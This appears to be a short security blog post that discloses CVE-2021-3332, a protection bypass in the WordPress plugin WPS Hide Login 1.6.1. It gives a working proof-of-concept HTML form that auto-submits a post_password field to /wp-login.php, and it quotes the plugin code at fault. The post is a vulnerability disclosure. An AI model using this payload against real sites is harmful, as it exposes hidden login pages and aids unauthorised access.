Sebastian's Blog

software developer. security enthusiast.

Security

WPS Hide Login 1.6.1 Protection Bypass (CVE-2021-3332)

Sebastian

The protective feature of WPS Hide Login can be bypassed by sending a crafted POST request containg the field post_password towards the default WordPress login url /wp-login.php.

<form id="form" method="post" action="https://blog.sebastianschmitt.eu/wp-login.php">
	<input type="hidden" name="post_password"/>
</form>

<script>
window.onload = function(){
  document.forms['form'].submit();
}
</script>

In file /classes/plugin.php on line 494 the plugin explicitly checks for the absence of this POST field but no else-case is defined.

        public function wp_loaded() {

                global $pagenow;

                $request = parse_url( rawurldecode( $_SERVER['REQUEST_URI'] ) );

                if ( ! isset( $_POST['post_password'] ) ) {

                        if ( is_admin() && ! is_user_logged_in() && ! defined( 'DOING_AJAX' ) && $pagenow !== 'admin-post.php' && $request['path'] !== '/wp-admin/options.php' ) {

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top